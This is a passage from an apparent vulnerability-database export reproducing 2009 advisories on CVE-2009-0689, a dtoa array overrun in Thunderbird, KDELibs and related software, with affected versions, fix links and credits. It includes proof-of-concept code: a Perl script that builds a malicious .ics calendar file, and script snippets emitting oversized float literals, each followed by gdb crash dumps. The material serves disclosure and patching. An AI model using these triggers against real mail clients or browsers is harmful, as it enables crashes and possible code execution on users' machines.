\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c \n \n \n--- 5. Credits --- \nDiscovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com. \n \n \n--- 6. Greets --- \nInfospec p_e_a pi3 \n \n \n--- 7. Contact --- \nEmail: \n- cxib {a.t] securityreason [d0t} com \n- sp3x {a.t] securityreason [d0t} com \n \nGPG: \n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg \n- http://securityreason.com/key/sp3x.gpg \n \nhttp://securityreason.com/ \nhttp://securityreason.pl/ \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83737/flock252-overrun.txt"}, {"lastseen": "2016-12-05T22:17:07", "description": "", "published": "2009-12-12T00:00:00", "type": "packetstorm", "title": "Thunderbird 2.0.0.23 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-12-12T00:00:00", "id": "PACKETSTORM:83740", "href": "https://packetstormsecurity.com/files/83740/Thunderbird-2.0.0.23-Remote-Array-Overrun.html", "sourceData": "`[ Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code \nexecution) ] \n \nAuthor: Maksymilian Arciemowicz and sp3x \nhttp://SecurityReason.com \nDate: \n- Dis.: 07.05.2009 \n- Pub.: 11.12.2009 \n \nCVE: CVE-2009-0689 \nCWE: CWE-119 \nRisk: High \nRemote: Yes \n \nAffected Software: \n- Thunderbird 2.0.0.23 \n \nFixed in: \n- Thunderbird 3.0 \n- Thunderbird 2.0.0.24pre \n \nNOTE: Prior versions may also be affected. \n \nOriginal URL: \nhttp://securityreason.com/achievement_securityalert/78 \n \n \n--- 0.Description --- \nThunderbird 2 includes many new features to help you manage your inbox. \nWith Thunderbird 2, it?s easier to prioritize and find your important \nemail with tags and the new find bar helps you find content within your \nemail faster. \nLightning brings the Sunbird calendar to the popular email client, \nMozilla Thunderbird. Since it's an extension, Lightning is tightly \nintegrated with Thunderbird, allowing it to easily perform email-related \ncalendaring tasks. \n \n \n--- 1. Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code \nexecution) --- \nThe main problem exist in dtoa implementation. Thunderbird has the same \ndtoa as Firefox, etc. This problem affects many additional Add-ons for \nthunderbird. \n \nExample for affected Add-ons: \n- Lightning 0.9 \n- Thunderbrowse 3.2.6.7 \n- more \n \nand it is the same like SREASONRES:20090625. \n \nhttp://securityreason.com/achievement_securityalert/63 \n \nbut fix for SREASONRES:20090625, used by openbsd was not good. \nMore information about fix for openbsd and similars SREASONRES:20091030, \n \nhttp://securityreason.com/achievement_securityalert/69 \n \nWe can create any number of float, which will overwrite the memory. In \nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and \nit is possible to call 16<= elements of freelist array. \n \n \n--- 2. Proof of Concept (PoC) --- \n \n(PoC for Lightning ) \n----------------------- \n#!/usr/bin/perl \n# SecurityReason.com \n# sp3x \n# tested on WinXp SP3 \n \nmy $header = \"BEGIN:VCALENDAR\\n\". \n\"PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.1//EN\\n\". \n\"VERSION:2.0\\n\". \n\"BEGIN:VTIMEZONE\\n\". \n\"TZID:Europe/Prague\\n\". \n\"X-LIC-LOCATION:Europe/Prague\\n\". \n\"BEGIN:DAYLIGHT\\n\". \n\"TZOFFSETFROM:+0100\\n\". \n\"TZOFFSETTO:+0200\\n\". \n\"TZNAME:CEST\\n\". \n\"DTSTART:19700329T020000\\n\". \n\"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3\\n\". \n\"END:DAYLIGHT\\n\". \n\"BEGIN:STANDARD\\n\". \n\"TZOFFSETFROM:+0200\\n\". \n\"TZOFFSETTO:+0100\\n\". \n\"TZNAME:CET\\n\". \n\"DTSTART:19701025T030000\\n\". \n\"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10\\n\". \n\"END:STANDARD\\n\". \n\"END:VTIMEZONE\\n\". \n\"BEGIN:VEVENT\\n\". \n\"CREATED:20091117T095214Z\\n\". \n\"LAST-MODIFIED:20091117T095217Z\\n\". \n\"DTSTAMP:20091117T095214Z\\n\". \n\"UID:5d0cfefe-22f6-476e-93bf-bd13df140b18\\n\"; \nmy $s = \"SUMMARY:0.\"; \nmy $expl = \"1\" x 296450; \nmy $footer = \"\\nDTSTART;TZID=Europe/Prague:20100111T110000\\n\". \n\"DTEND;TZID=Europe/Prague:20100111T120000\\n\". \n\"END:VEVENT\\n\". \n\"END:VCALENDAR\\n\"; \n \nopen(myfile,'>>test.ics'); \nprint myfile $header.$s.$expl.$footer; \n----------------------- \n \n(PoC for Thunderbrowse ) \n----------------------- \n<script> \nvar a=0.<?php echo str_repeat(\"1\",333333); ?>; \n</script> \n----------------------- \n \nWhen we use Thunderbrowse to see this site, Thunderbird will crash with: \n \nProgram terminated with signal 11, Segmentation fault. \n#0 0xbb15d1e7 in ?? () \n \neax 0x0 0 \necx 0xa 10 \nedx 0x0 0 \nebx 0xbb16eb38 -1156125896 \nesp 0xbfbfce58 0xbfbfce58 \nebp 0xbfbfce74 0xbfbfce74 \nesi 0xb 11 \nedi 0xb768e700 -1217861888 \neip 0xbb15d1e7 0xbb15d1e7 \neflags 0x282 [ SF IF ] \ncs 0x23 35 \nss 0x2b 43 \nds 0x2b 43 \nes 0x2b 43 \nfs 0xab 171 \ngs 0xb3 179 \n \n(gdb) x/x ($eip) \n0xbb15d1e7: Cannot access memory at address 0xbb15d1e7 \n(gdb) x/x ($esi) \n0xb: Cannot access memory at address 0xb \n(gdb) x/x ($edi) \n0xb768e700: 0x1c71c71c \n \nnow esi=0xb and edi=0x1c71c71c \n \n(gdb) x/20x ($edi) \n0xb768e700: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c \n0xb768e710: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7 \n0xb768e720: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71 \n0xb768e730: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c \n0xb768e740: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7 \n \n(gdb) x/50x ($edi)+37000 \n0xb7697788: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7 \n0xb7697798: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71 \n0xb76977a8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c \n0xb76977b8: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7 \n0xb76977c8: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71 \n0xb76977d8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c \n0xb76977e8: 0xc71c71c7 0x91c71c71 0x0b76d741 0x1af63420 \n0xb76977f8: 0x7c6568c4 0xd74952a1 0x552d1c87 0x4018081a \n0xb7697808: 0xcb313ca6 0xd16c5484 0x36d13467 0x130c4b7d \n0xb7697818: 0x92c1d06c 0xf70d9591 0x56bea87c 0x7c7bcc44 \n0xb7697828: 0xe6dd415d 0x210c53a8 0x482d162b 0x6d39c1c9 \n0xb7697838: 0x478f5fb2 0x9d6a2f46 0xe8b20d52 0xb012aa49 \n0xb7697848: 0xd75822f6 0x83ebbe5a \n \n \n--- 3. SecurityReason Note --- \nOfficialy SREASONRES:20090625 has been detected in: \n- OpenBSD \n- NetBSD \n- FreeBSD \n- MacOSX \n- Google Chrome \n- Mozilla Firefox \n- Mozilla Seamonkey \n- Mozilla Thunderbird \n- Mozilla Sunbird \n- Mozilla Camino \n- KDE (example: konqueror) \n- Opera \n- K-Meleon \n- F-Lock \n \nThis list is not yet closed. \n \n \n--- 4. Fix --- \nNetBSD fix (optimal): \nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h \n \nOpenBSD fix: \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c \n \n \n--- 5. Credits --- \nDiscovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com. \n \n \n--- 6. Greets --- \nInfospec p_e_a pi3 \n \n \n--- 7. Contact --- \nEmail: \n- cxib {a.t] securityreason [d0t} com \n- sp3x {a.t] securityreason [d0t} com \n \nGPG: \n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg \n- http://securityreason.com/key/sp3x.gpg \n \nhttp://securityreason.com/ \nhttp://securityreason.pl/ \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83740/thunderbird-overrun.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "description": "Please update CVE-2009-1563 BID:36851 and BID:36843\r\n\r\nMozilla has changed credit. \r\n\r\nhttp://www.mozilla.org/security/announce/2009/mfsa2009-59.html\r\n\r\nand add correct CVE: CVE-2009-0689.\r\n\r\nCVE-2009-1563 shouldn&#39;t never exists. It is duplicate.", "edition": 1, "modified": "2009-11-20T00:00:00", "published": "2009-11-20T00:00:00", "id": "SECURITYVULNS:DOC:22812", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22812", "title": "Firefox 3.5.3 Remote Array Overrun &#40;UPDATE&#41;", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ KDE KDELibs 4.3.3 Remote Array Overrun &#40;Arbitrary code execution&#41; ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - KDELibs 4.3.3\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/74\r\n\r\n\r\n- --- 0.Description ---\r\nKDELibs is a collection of libraries built on top of Qt that provides\r\nframeworks and functionality for developers of KDE-compatible software.\r\nThe KDELibs libraries are licensed under LGPL.\r\n\r\n\r\n- --- 1. KDE KDELibs 4.3.2 Remote Array Overrun &#40;Arbitrary code execution&#41; ---\r\nThe main problem exist in dtoa implementation. KDE has a very similar\r\ndtoa algorithm to the BSD, Chrome and Mozilla products. Problem exist\r\nin dtoa.cpp file \r\n\r\nhttp://websvn.kde.org/tags/KDE/4.3.3/kdelibs/kjs/dtoa.cpp?revision=1042584&amp;view=markup\r\n\r\nand it is the same like SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good. \r\nMore information about fix for openbsd and similars SREASONRES:20091030, \r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don&#39;t checks Kmax limit, and\r\nit is possible to call 16&lt;= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept &#40;PoC&#41; ---\r\n\r\n- -----------------------\r\n&lt;script&gt;\r\nvar a=0.&lt;?php echo str_repeat&#40;&quot;9&quot;,299999&#41;; ?&gt;;\r\n&lt;/script&gt;\r\n- -----------------------\r\n\r\nIf we use konqueror to see this PoC, konqueror will crash. For example\r\n\r\n- -----------------------\r\n&lt;script&gt;\r\nvar a=0.&lt;?php echo str_repeat&#40;&quot;1&quot;,296450&#41;; ?&gt;;\r\n&lt;/script&gt;\r\n- -----------------------\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[Switching to process 24845, thread 0x7e6e6800]\r\n0x090985c3 in diff &#40;&#41; from /usr/local/lib/libkjs.so.5.0\r\n\r\n0x06db85c3 &lt;diff+163&gt;: mov &#37;esi,&#40;&#37;ecx&#41;\r\n\r\n#0 0x090985c3 in diff &#40;&#41; from /usr/local/lib/libkjs.so.5.0\r\n#1 0x0909901b in kjs_strtod &#40;&#41; from /usr/local/lib/libkjs.so.5.0\r\n#2 0x090738e5 in KJS::Lexer::lex &#40;&#41; from /usr/local/lib/libkjs.so.5.0\r\n#3 0x0907300c in kjsyylex &#40;&#41; from /usr/local/lib/libkjs.so.5.0\r\n#4 0x09072f86 in kjsyyparse &#40;&#41; from /usr/local/lib/libkjs.so.5.0\r\n#5 0x090805cf in KJS::Parser::parse &#40;&#41; from /usr/local/lib/libkjs.so.5.0\r\n#6 0x0908337f in KJS::InterpreterImp::evaluate &#40;&#41;\r\n\r\n&#40;gdb&#41; i r\r\neax 0x0 0\r\necx 0x220ff000 571469824\r\nedx 0x0 0\r\nebx 0x220fbb00 571456256\r\nesp 0xcfbc04e0 0xcfbc04e0\r\nebp 0xcfbc0518 0xcfbc0518\r\nesi 0xc71c71c7 -954437177\r\nedi 0x0 0\r\neip 0x21415c3 0x21415c3\r\n\r\nesi=0x71c71c7\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE &#40;example: konqueror&#41;\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all vendors about this issue,\r\nhowever, they did not do it. Even greater confusion caused new CVE number &quot;CVE-2009-1563&quot;. Secunia\r\nhas informed that this vulnerability was only detected in Mozilla Firefox, but nobody was aware that\r\nthe problem affects other products like &#40; KDE, Chrome &#41; and it is based on &quot;CVE-2009-0689&quot;. After\r\nsome time Mozilla Foundation Security Advisory\r\n&#40;&quot;http://www.mozilla.org/security/announce/2009/mfsa2009-59.html&quot;&#41;\r\nwas updated with note :\r\n&quot;The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that\r\nreported against the libc gdtoa routine by Maksymilian Arciemowicz &#40; CVE-2009-0689&#41;&quot;.\r\nThis fact &#40; new CVE number for Firefox Vulnerability &#41;and PoC in javascript &#40;from Secunia&#41;, forced\r\nus to official notification all other vendors. We publish all the individual advisories, to formally\r\nshow all vulnerable software and to avoid wrong CVE number. We do not see any other way to fix this\r\nissue in all products.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix &#40;optimal&#41;:\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail: \r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com \r\n\r\nGPG: \r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF2HsACgkQpiCeOKaYa9abFgCeOj6IX5FzaAq60qQ3TUPGUiU6\r\nKJkAoJiZ0eZtGXR0GvwfPT4y5A4yKFqw\r\n=hMGC\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-11-20T00:00:00", "published": "2009-11-20T00:00:00", "id": "SECURITYVULNS:DOC:22815", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22815", "title": "KDE KDELibs 4.3.3 Remote Array Overrun &#40;Arbitrary code execution&#41;", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ K-Meleon 1.5.3 Remote Array Overrun &#40;Arbitrary code execution&#41; ]\r\n\r\nAuthor: Maksymilian Arciemowicz and 